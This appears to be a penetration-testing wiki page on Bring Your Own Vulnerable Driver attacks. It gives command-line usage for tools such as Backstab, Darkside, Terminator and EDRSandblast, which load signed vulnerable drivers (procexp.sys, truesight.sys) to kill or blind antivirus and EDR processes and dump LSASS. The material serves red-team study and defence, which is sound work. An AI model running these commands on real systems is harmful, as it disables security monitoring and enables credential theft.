Bring Your Own Vulnerable Driver (BYOVD)

MITRE ATT&CK™ Exploitation for Privilege Escalation - Technique T1068

Theory

As a security mechanism, Windows by default employs a feature called Driver Signature Enforcement that ensures kernel-mode drivers have been signed by a valid code signing authority before Windows will permit them to run.

However, we may bring a signed vulnerable driver onto a compromised machine so that we can exploit the vulnerability to execute code in kernel mode.

That technique requires administrative privileges on the target.

Practice

Killing AV/EDDR

Gaining kernel-mode access through vulnerable drivers exploit enables a Windows Kernel-Mode Code Integrity (KMCI) bypass, allowing the termination of Protected Process Light (PPL) processes, such as EDR or AV tools.

Backstab is a tool capable of killing antimalware protected processes by leveraging sysinternals’ Process Explorer driver (procexp.sys).

# -n,	Choose process by name, including the .exe suffix
# -p, 	Choose process by PID
# -l, 	List handles of protected process
# -k, 	Kill the protected process by closing its handles
# -x, 	Close a specific handle
# -d, 	Specify path to where ProcExp will be extracted
# -s, 	Specify service name registry key
# -u, 	Unload ProcExp driver
# -a,	adds SeDebugPrivilege

#Examples:
#Kill cyserver
backstab.exe -n cyserver.exe -k

#Close handle E4C of cyserver
backstab.exe -n cyserver.exe -x E4C

#List all handles of cyserver
backstab.exe -n cyserver.exe -l

#Kill protected process with PID 4326, extract ProcExp driver to C:\ drive
backstab.exe -p 4326 -k -d c:\\driver.sys

Truesight.sys is a vulnerable driver from Rogue Anti-Malware Driver 3.3. It can be abuse to kill a PPL process

Darkside

Darkside is a C# AV/EDR Killer that exploit the truesight.sys driver. To exploit, first load and start the driver:

sc create TrueSight binPath="c:\path\to\truesight.sys" type= kernel start= demand
sc start TrueSight

Then, start Darkside by specifing the PID to kill.

Darkside.exe -p <PID>

TrueSightKiller

TrueSightKiller is a CPP AV/EDR Killer that exploit the truesight.sys driver. To exploit, you need to have the truesight.sys driver located at the same location as the executable.

# By porcess name
TrueSightKiller.exe -n <ProcessName.exe>

# By pid
TrueSightKiller.exe -p <PID>

Terminator terminate all EDR/XDR/AVs processes by abusing the zam64.sys driver. To exploit, place the driver Terminator.sys in the same path as the executable

Terminator.exe

Windows Filtering Platform (WPF) Callout Driver

A callout driver implements one or more callouts. Callouts extend the capabilities of the Windows Filtering Platform by processing TCP/IP-based network data in ways that are beyond the scope of the simple filtering functionality. By exploiting such driver we can block outbound traffic from EDR processes.

EDRPrison leverages a legitimate WFP callout driver, WinDivert, to effectively silence EDR systems. This project focuses on network-based evasion techniques.

EDRPrison.exe

Kernel Object Tampering

EDRSandblast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Notify Routine callbacks, Object Callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] <audit | dump | cmd | credguard | firewall | load_unsigned_driver>
[--usermode] [--unhook-method <N>] [--direct-syscalls] [--add-dll <dll name or path>]*
[--kernelmode] [--dont-unload-driver] [--no-restore]
    [--nt-offsets <NtoskrnlOffsets.csv>] [--fltmgr-offsets <FltmgrOffsets.csv>] [--wdigest-offsets <WdigestOffsets.csv>] [--ci-offsets <CiOffsets.csv>] [--internet]
    [--vuln-driver <RTCore64.sys>] [--vuln-service <SERVICE_NAME>]
    [--unsigned-driver <evil.sys>] [--unsigned-service <SERVICE_NAME>]
    [--no-kdp]
[-o | --dump-output <DUMP_FILE>]

Hijacking Valid Drivers

The technique will not work on HVCI systems due to the impossibility to change the LSTAR pointers if protected by the Hyper-V

DriverJack is a tool designed to load a vulnerable driver by abusing lesser-known NTFS techniques. These method bypass the registration of a Driver Service on the system by hijacking an existing service, and also spoof the image path presented in the Driver Load event. To further masquerade the presence of a vulnerable driver, the attack also abuses an Emulated Filesystem Read-Only bypass to swap the content of a driver file on a mounted ISO before loading it.

DriverJack.exe

Resources

Kasseika Ransomware Deploys BYOVD Attacks Abuses PsExec and Exploits Martini DriverTrend Micro

Last updated 1 year ago

hashtagTheory

hashtagPractice

hashtagKilling AV/EDDR

hashtagDarkside

hashtagTrueSightKiller

hashtagWindows Filtering Platform (WPF) Callout Driver

hashtagKernel Object Tampering

hashtagHijacking Valid Drivers

hashtagResources

Theory

Practice

Killing AV/EDDR

Darkside

TrueSightKiller

Windows Filtering Platform (WPF) Callout Driver

Kernel Object Tampering

Hijacking Valid Drivers

Resources